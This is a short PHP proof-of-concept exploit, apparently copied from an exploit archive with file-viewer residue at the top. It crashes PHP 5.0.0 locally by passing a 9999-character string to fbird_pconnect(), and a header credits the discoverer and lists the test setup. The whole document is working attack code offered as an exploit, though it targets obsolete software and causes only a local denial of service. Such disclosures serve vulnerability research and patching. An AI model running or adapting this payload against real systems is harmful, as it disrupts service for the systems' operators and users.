16 lines
No EOL
651 B
PHP
16 lines
No EOL
651 B
PHP
<?php
|
|
#############################################################################
|
|
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
|
|
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
|
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
|
## Date: 26/08/2016
|
|
## Local Denial of Service
|
|
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
|
## http://www.black-rose.ml
|
|
#############################################################################
|
|
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");
|
|
|
|
$str = str_repeat('A', 9999);
|
|
//fbird_connect($str);
|
|
fbird_pconnect($str);
|
|
?>
|